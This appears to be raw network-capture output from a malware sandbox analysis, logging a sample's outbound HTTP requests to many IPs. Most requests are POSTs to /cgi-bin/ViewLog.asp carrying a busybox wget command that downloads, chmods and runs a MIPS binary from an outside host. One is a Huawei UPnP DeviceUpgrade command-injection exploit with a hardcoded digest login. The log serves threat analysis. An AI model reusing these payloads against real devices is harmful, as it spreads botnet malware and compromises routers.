                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              179192.168.2.134011295.164.22.868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.975636959 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              180192.168.2.134044231.128.217.2208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:50.991961002 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:51.227312088 CET475INHTTP/1.1 200 OK
                                              Content-Security-Policy: default-src *; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; frame-ancestors 'self'
                                              X-Frame-Options: SAMEORIGIN
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Date: Thu, 23 Nov 2023 04:15:51 GMT
                                              Etag: "5c936401.2096"
                                              Content-Type: text/html
                                              Content-Length: 2096
                                              Connection: close
                                              Accept-Ranges: bytes


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              181192.168.2.135894294.198.129.1718080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:51.373369932 CET322INHTTP/1.0 400 Bad Request
                                              Server: httpd
                                              Date: Thu, 23 Nov 2023 04:15:51 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              182192.168.2.134045831.128.217.2208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:51.453224897 CET171INHTTP/1.1 500 Server Error
                                              Content-Length: 48
                                              Date: Thu, 23 Nov 2023 04:15:51 GMT
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              183192.168.2.136038641.42.88.837215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:52.592377901 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:52.893522024 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              184192.168.2.134848031.136.210.658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:52.755934954 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:53.350564003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:54.502743959 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:56.966700077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:01.574585915 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:10.790605068 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:29.734528065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:06.598368883 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              185192.168.2.136072094.255.188.368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:52.770639896 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:52.978672981 CET680INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 431
                                              Date: Thu, 23 Nov 2023 04:15:52 GMT
                                              Keep-Alive: timeout=5
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              186192.168.2.135529895.86.103.168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:52.798794985 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              187192.168.2.134014294.152.53.248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:53.008662939 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:53.219481945 CET101INHTTP/1.1 405 Method Not Allowed


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              188192.168.2.134878694.120.39.2138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.533782005 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              189192.168.2.135531094.101.186.1108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.642018080 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:57.414668083 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:57.759725094 CET167INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:15:57 GMT
                                              Content-Length: 0
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              190192.168.2.134042494.121.181.2118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.758732080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              191192.168.2.135921031.128.223.568080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.772511005 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:56.010781050 CET523INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/html; charset=utf-8
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Security-Policy: frame-ancestors 'none'
                                              Strict-Transport-Security: max-age=3600
                                              Content-Length: 130
